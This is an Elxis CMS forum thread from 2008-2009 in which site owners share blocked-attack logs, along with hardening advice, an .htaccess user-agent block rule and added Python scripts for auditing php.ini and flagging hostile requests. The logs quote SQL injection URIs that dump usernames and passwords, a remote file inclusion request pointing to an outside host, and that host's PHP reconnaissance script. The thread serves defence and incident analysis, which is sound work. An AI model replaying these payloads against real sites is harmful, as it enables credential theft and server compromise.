Elxis CMS Forum

Support => Security => Topic started by: nikos65 on October 16, 2008, 23:18:19

Title: Combination of attacks in 3 sites
Post by: nikos65 on October 16, 2008, 23:18:19
1. Site
ATTACKER IP ADDRESS: 213.132.76.26 (blocked)
Requested URI: /index2.php?option=ds-syndicate&version=1&feed_id=1 union select 1,cast(concat(username,0x3a,0x3a,0x3a,password,0x3a,usertype) as binary),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from nstp_users limit 1,1--
DATE: 16-10-2008 13:48:28
Attack was logged


2. Site
Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 213.132.76.26 (blocked)
DATE: 16-10-2008 15:02:13
Attack was logged

3. Site
Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 213.132.76.26 (blocked)
DATE: 16-10-2008 15:02:15
Attack was logged
Combination of attacks in 3 sites

Thanks elxis  ;D
Title: Re: Combination of attacks in 3 sites
Post by: nikos65 on October 16, 2008, 23:21:11
Just noticed that earlier today I had another attack from the same IP on another site ??? ???

Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 213.132.76.26 (blocked)
DATE: 16-10-2008 11:49:31
Attack was logged


I've just checked:

Whois Record

inetnum:        213.132.76.0 - 213.132.76.255
netname:        KTC-FTTB
descr:          Kubtelecom FTTB network
descr:          Russian Federation
Title: Re: Combination of attacks in 3 sites
Post by: datahell on October 17, 2008, 00:24:36
I also face an increased number of attacks these days. Mostly from China and Japan (as usual...)
Title: Re: Combination of attacks in 3 sites
Post by: rentasite on October 17, 2008, 11:09:56


Got some attacks from the same IP (213.132.76.26). On 4-5 Elxis sites.

I banned the IP from my server also.
Title: Re: Combination of attacks in 3 sites
Post by: nikos65 on October 17, 2008, 11:18:38
Probably the attacker uses a static IP!!
If I were the attacker I would never use the same IP to attack.
Title: Re: Combination of attacks in 3 sites
Post by: datahell on October 17, 2008, 13:22:58
Secure your PHP and your web server, use the Elxis security tools and your site will be like a fortress.
You have nothing to worry about for this kind of attack. They usually use pre-made scripts that massively scan sites for certain Joomla components with security holes.

They are amateurs but you must always be careful. A friend's server was hacked lately due to a bad server set-up. The hacker, with a simple pre-made PHP script that he uploaded to a site, gained access to 468 web sites on the server (cPanel accounts, databases, FTP accounts, etc)!

Simple but effective server security guide:
Disable the PHP functions that Elxis proposes you disable in the first step of the installation procedure (exec, system, popen, dl, set_time_limit, ini_set, etc).
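A way to check that a server actually follows the advice above, as an added example (it is not Elxis code and not part of the original post). The two php.ini fragments are constructed samples; only the list of function names comes from the post. The allow_url_fopen / allow_url_include checks go beyond the post: those settings decide whether PHP fetches a remote URL handed to fopen() or include(), which is what the mosConfig_absolute_path=http://... requests quoted later in this thread rely on.

```python
"""Audit php.ini's disable_functions against the list named in the post above.

Added example; not Elxis code. WEAK_INI and HARDENED_INI are constructed samples.
"""
import re

# Functions the post says Elxis proposes to disable at install time.
RECOMMENDED = {"exec", "system", "popen", "dl", "set_time_limit", "ini_set"}

# Constructed sample: a stock php.ini where nothing has been disabled.
WEAK_INI = """
; constructed sample, not a real server's file
expose_php = On
disable_functions =
allow_url_fopen = On
allow_url_include = On
"""

# Constructed sample: the same file after applying the advice.
HARDENED_INI = """
; constructed sample, not a real server's file
expose_php = Off
disable_functions = "exec,system,popen,dl,set_time_limit,ini_set,passthru,shell_exec,proc_open"
allow_url_fopen = Off
allow_url_include = Off
"""

SETTING_RE = re.compile(r"^([A-Za-z_.]+)\s*=\s*(.*)$")

# Settings beyond disable_functions that weaken the server when left On.
RISKY_IF_ON = {
    "allow_url_fopen": "fopen()-style functions will fetch remote URLs",
    "allow_url_include": "include()/require() will fetch remote URLs",
    "expose_php": "the PHP version is advertised in response headers",
}


def ini_value(ini_text, key):
    """Return the value of `key` from php.ini-style text ('' if absent).
    Comment lines start with ';'; the last assignment wins, as in PHP."""
    value = ""
    for raw in ini_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        m = SETTING_RE.match(line)
        if m and m.group(1) == key:
            value = m.group(2).strip().strip('"')
    return value


def is_on(value):
    return value.strip().lower() in ("on", "1", "true", "yes")


def disabled_functions(ini_text):
    raw = ini_value(ini_text, "disable_functions")
    return {name.strip().lower() for name in re.split(r"[,\s]+", raw) if name.strip()}


def audit(ini_text):
    """Return (still_enabled, findings): recommended functions that are not
    disabled, plus other settings that weaken the server."""
    still_enabled = sorted(RECOMMENDED - disabled_functions(ini_text))
    findings = [f"{key} is On: {why}" for key, why in RISKY_IF_ON.items()
                if is_on(ini_value(ini_text, key))]
    return still_enabled, findings


if __name__ == "__main__":
    for label, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        enabled, findings = audit(ini)
        print(f"{label}: still enabled = {enabled or 'none'}; findings = {findings or 'none'}")
```

Run it against the output of `php -i` or the live php.ini rather than the samples; the point is that disable_functions only helps for names that are actually in the list, and a typo or a missing name silently leaves that function available.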
Title: Re: Combination of attacks in 3 sites
Post by: jimmyz on December 20, 2008, 15:37:58
I got one here too...

Quote
Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 82.197.222.145
Requested URI: /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.europeytu.com/.httpaccess/roid.txt???
DATE: 19-12-2008 01:05:10
Attack was logged
Site turned offline for 120 seconds

If one types
Code: [Select]
http://www.europeytu.com/.httpaccess/roid.txt
then he can see:
Code: [Select]
<?
echo "ALBANIA<br>";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo "os: $os<br>";
echo "uname -a: $alb<br>";
echo "uptime: $alb2<br>";
echo "id: $alb3<br>";
echo "pwd: $alb4<br>";
echo "user: $alb9<br>";
echo "phpv: $alb6<br>";
echo "SoftWare: $alb5<br>";
echo "ServerName: $alb7<br>";
echo "ServerAddr: $alb8<br>";
echo "UNITED ALBANIANS aka ALBOSS PARADISE<br>";
exit;
?>

As far as I know (very, very little), .httpaccess is a file, not a folder. How can they have ../.httpaccess/roid.txt?
Is it possible that they don't have a file named .httpaccess, but a folder?
And, do you think www.europeytu.com is aware of this? Should I inform them?

My access.log says:
Quote
82.197.222.145 - - [19/Dec/2008:01:05:02 -0600] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.europeytu.com/.httpaccess/roid.txt??? HTTP/1.1" 200 208 "-" "libwww-perl/5.79"
Bbclone:
Quote
19 Dec, 09:05:03       Ολλανδία    82.197.222.145   1       libWWW 5.79      libWWW 5.79
I also can't explain the difference in the reported time of the attack.
Any ideas?
Title: Re: Combination of attacks in 3 sites
Post by: Ivan Trebješanin on December 20, 2008, 16:47:39
You can add these lines into your .htaccess file:

Code: [Select]
RewriteCond %{HTTP_USER_AGENT} libwww-perl.*
RewriteRule .* - [F,L]

That would block the libwww agent from accessing your site.

PS
Don't worry, attacks like you quoted are not serious at all.
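The log line jimmyz quoted and the user-agent rule Ivan gave, checked by a short detector: an added example, not Elxis Defender code and not part of either post. The first sample line is the access.log entry from the post above; the other two are constructed. The user-agent test is the same condition the RewriteCond expresses; the parameter test (a full URL supplied as a parameter value) is an addition that does not depend on the client's user agent. Timestamps are converted to UTC so entries from logs kept in different local time zones line up.

```python
"""Spot the request classes discussed above in Apache combined-format log lines.

Added example; not Elxis Defender code. Only the first SAMPLE_LOG line is from
the thread; the others are constructed.
"""
import re
from datetime import datetime, timezone
from urllib.parse import urlsplit, parse_qsl, unquote

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) (?P<proto>\S+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

SAMPLE_LOG = [
    # quoted from the post above
    '82.197.222.145 - - [19/Dec/2008:01:05:02 -0600] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.europeytu.com/.httpaccess/roid.txt??? HTTP/1.1" 200 208 "-" "libwww-perl/5.79"',
    # constructed: an ordinary visitor
    '10.0.0.5 - - [19/Dec/2008:01:06:10 -0600] "GET /index.php?option=com_content&task=view&id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    # constructed: the same client library making a harmless request
    '10.0.0.6 - - [19/Dec/2008:01:07:00 -0600] "GET /robots.txt HTTP/1.1" 404 210 "-" "libwww-perl/5.805"',
]

BLOCKED_AGENTS = ("libwww-perl",)   # what Ivan's RewriteCond matches on


def to_utc(apache_ts):
    """'19/Dec/2008:01:05:02 -0600' -> '2008-12-19T07:05:02+00:00'."""
    return datetime.strptime(apache_ts, "%d/%b/%Y:%H:%M:%S %z").astimezone(timezone.utc).isoformat()


def analyse(line):
    """Return (ip, utc_time, flags) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    flags = []
    ua = m.group("ua").lower()
    for agent in BLOCKED_AGENTS:
        if agent in ua:
            flags.append(f"user-agent:{agent}")
    # A parameter whose value is itself a URL is the remote-include pattern
    # seen in the quoted request, whatever client sent it.
    query = urlsplit(m.group("uri")).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        if re.match(r"^(https?|ftp)://", unquote(value).strip().lower()):
            flags.append(f"remote-url-in-parameter:{name}")
    return m.group("ip"), to_utc(m.group("ts")), flags


def scan(lines):
    """Return the analysed entries that raised at least one flag."""
    hits = []
    for line in lines:
        result = analyse(line)
        if result and result[2]:
            hits.append(result)
    return hits


if __name__ == "__main__":
    for ip, when, flags in scan(SAMPLE_LOG):
        print(ip, when, ", ".join(flags))
```

Two things the output shows. The quoted entry is flagged on both counts, while the constructed robots.txt fetch is flagged only on its user agent: a rule that keys on the agent string alone, as the .htaccess lines do, stops unmodified tools but nothing that sets a browser-like agent, so the parameter check is the one worth keeping in the log review. And the quoted timestamp, 01:05:02 at offset -0600, is 07:05:02 UTC; a second log that displays the same event with a different clock time is usually just rendering it in another local zone, so compare sources in UTC before reading anything into a gap.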
Title: Re: Combination of attacks in 3 sites
Post by: jimmyz on December 22, 2008, 11:40:47
Ivan, thank you for the quick reply.

But, is it really the agent guilty for the attack?
Or has it just been used?

Title: Re: Combination of attacks in 3 sites
Post by: Ivan Trebješanin on December 22, 2008, 12:40:50
But, is it really the agent guilty for the attack?

No, agents don't attack. But this is a very common "hacker's" tool.
Anyway, judging from the URL, this was just a script kiddie's attack. It is not worth attention.
Title: Re: Combination of attacks in 3 sites
Post by: rentasite on January 14, 2009, 16:42:34

Today i got this:

Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 193.111.244.21 (blocked)
Requested URI: /index.php?option=com_user&amp;task=confirmreset
DATE: 14-01-2009 14:55:01
Attack was logged
Title: Re: Combination of attacks in 3 sites
Post by: rentasite on January 26, 2009, 11:34:54

Today

Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 72.32.68.106 (blocked)
Requested URI: /com_downloads/elxis-templates//index.php?option=com_downloads&amp;Itemid=S@BUN&amp;func=selectfolder&amp;filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*
DATE: 26-01-2009 04:24:55
Attack was logged
Title: Re: Combination of attacks in 3 sites
Post by: CREATIVE Options on January 26, 2009, 13:27:32
Welcome :)

Code: [Select]
//index.php?option=com_downloads&amp;Itemid=S@BUN&amp;func=selectfolder&amp;filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*
Code: [Select]
/com_downloads//index.php?option=com_downloads&amp;Itemid=S@BUN&amp;func=selectfolder&amp;filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*
Of course all have been blocked! thanks Elxis Defender !
Title: Re: Combination of attacks in 3 sites
Post by: ks-net on January 26, 2009, 13:38:27
Elxis has become a famous CMS.....

IT IS THE FIRST TIME I SEE AN ELXIS COMPONENT IN URLS AND NOT JOOMLA-MAMBO...
Title: Re: Combination of attacks in 3 sites
Post by: CREATIVE Options on January 26, 2009, 14:03:41
Elxis has become a famous CMS.....

IT IS THE FIRST TIME I SEE AN ELXIS COMPONENT IN URLS AND NOT JOOMLA-MAMBO...


Kosta, I have seen similar attacks before, and ALL the attacks have been blocked successfully.
I run some websites which have a HIGH level of risk and they have been targeted many times. And some of these attacks were specific to the Elxis code.

I have posted in the past guides / instructions to set up the Elxis Defender for HIGH risk websites; you can find them in the forum.
Title: Re: Combination of attacks in 3 sites
Post by: datahell on January 26, 2009, 18:51:30
This is not an attack on Elxis, it is an attack on Mambo sites... Notice the URL, it says "mos_users"; also the func variable does not exist in Elxis or in the downloads component. You have nothing to be afraid of...
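The check datahell makes by eye, reading the table name out of the payload and comparing its prefix with the site's own, done in code as an added example (not Elxis code and not part of the post). It first reverses the obfuscation visible in the quoted requests (HTML-escaped `&amp;`, `/**/` comment padding, URL encoding, `0x..` hex literals) and then looks at what follows FROM. The two sample URIs are the ones quoted in rentasite's post of 26 January and in the first post; the third is constructed. Using `nstp_` as the site's configured table prefix is an assumption taken from the first post's log line.

```python
"""Normalise the UNION SELECT payloads quoted in this thread and read off the
table they target.

Added example; not Elxis code. SITE_TABLE_PREFIX is an assumption.
"""
import re
from urllib.parse import unquote_plus

SAMPLE_URIS = [
    # quoted from rentasite's post of 26 January
    "/com_downloads/elxis-templates//index.php?option=com_downloads&amp;Itemid=S@BUN&amp;func=selectfolder&amp;filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*",
    # quoted from the first post
    "/index2.php?option=ds-syndicate&version=1&feed_id=1 union select 1,cast(concat(username,0x3a,0x3a,0x3a,password,0x3a,usertype) as binary),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from nstp_users limit 1,1--",
    # constructed: an ordinary request
    "/index.php?option=com_content&task=view&id=5",
]

SITE_TABLE_PREFIX = "nstp_"   # assumption: the prefix this site's tables actually use

HEX_LITERAL = re.compile(r"0x([0-9a-f]+)\b")
UNION_FROM = re.compile(r"\bunion\b.*\bselect\b.*\bfrom\s+([a-z0-9_]+)")


def _decode_hex(m):
    """0x3a -> ':' ; leave odd-length or non-printable literals untouched."""
    digits = m.group(1)
    if len(digits) % 2:
        return m.group(0)
    text = bytes.fromhex(digits).decode("latin-1")
    return "'" + text + "'" if text.isprintable() else m.group(0)


def normalise(uri):
    """Undo the layers of encoding so the SQL reads as the database would see it."""
    s = uri
    while "&amp;" in s:                 # undo HTML escaping, even when doubled
        s = s.replace("&amp;", "&")
    s = unquote_plus(s)                 # percent-decoding and '+'
    s = s.replace("/**/", " ")          # MySQL comment used as whitespace
    s = re.sub(r"\s+", " ", s).lower()
    return HEX_LITERAL.sub(_decode_hex, s)


def classify(uri):
    """Return a dict: whether the request carries a UNION SELECT, the table
    named after FROM, and whether that table uses this site's prefix."""
    s = normalise(uri)
    m = UNION_FROM.search(s)
    table = m.group(1) if m else None
    return {
        "sqli": m is not None,
        "table": table,
        "targets_own_prefix": bool(table) and table.startswith(SITE_TABLE_PREFIX),
    }


if __name__ == "__main__":
    for uri in SAMPLE_URIS:
        print(classify(uri))
```

The first URI resolves to `mos_users`, the Mambo/Joomla 1.0 default, which does not match the assumed prefix: a mass scan aimed at another CMS, as datahell says. The second resolves to `nstp_users`, so that one was built for the site it hit and deserves a closer look at the component it names, even though Defender blocked it.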
Title: Re: Combination of attacks in 3 sites
Post by: jimmyz on January 28, 2009, 14:17:31
Just for the record, here are the four different types of URIs, in twelve attacks, on the same site.

Code: [Select]
Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 72.32.68.106
Requested URI: //index.php?option=com_downloads&amp;Itemid=S@BUN&amp;func=selectfolder&amp;filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*
DATE: 26-01-2009 04:24:55


Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 72.32.68.106
Requested URI: /index.php?option=com_downloads&amp;Ite ...//index.php?option=com_downloads&amp;Itemid=S@BUN&amp;func=selectfolder&amp;filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*
DATE: 26-01-2009 04:27:34


Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 72.32.68.106
Requested URI: /index.php?option=com_downloads&amp;amp;Itemid=145&amp;amp;mylang=english//index.php?option=com_downloads&amp;Itemid=S@BUN&amp;func=selectfolder&amp;filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*
DATE: 26-01-2009 04:27:41


Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 72.32.68.106
Requested URI: /index.php?option=com_downloads&amp;amp;task=category&amp;amp;cid=2&amp;amp;Itemid=144//index.php?option=com_downloads&amp;Itemid=S@BUN&amp;func=selectfolder&amp;filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*
DATE: 26-01-2009 04:27:42

Should I use the abuse mail of the company that owns this IP?
Title: Re: Combination of attacks in 3 sites
Post by: rentasite on January 28, 2009, 14:19:46
Should I use the abuse mail of the company that owns this IP?

If you haven't anything else to do, yes  ;D

Title: Re: Combination of attacks in 3 sites
Post by: jimmyz on January 28, 2009, 14:36:22
Just a thought... :-\
Title: Re: Combination of attacks in 3 sites
Post by: CREATIVE Options on February 02, 2009, 21:27:31
Something new :)

Code: [Select]
Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 115.49.70.18 (blocked)
Requested URI: /blog/corfu-news/corfu/?page=3 and char(124)+user+char(124)=0
DATE: 02-02-2009 19:55:14

Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 115.49.70.18 (blocked)
Requested URI: /blog/corfu-news/corfu/?page=3\' and char(124)+user+char(124)=0 and \'%\'=\'
DATE: 02-02-2009 19:55:15

TY Elxis Defender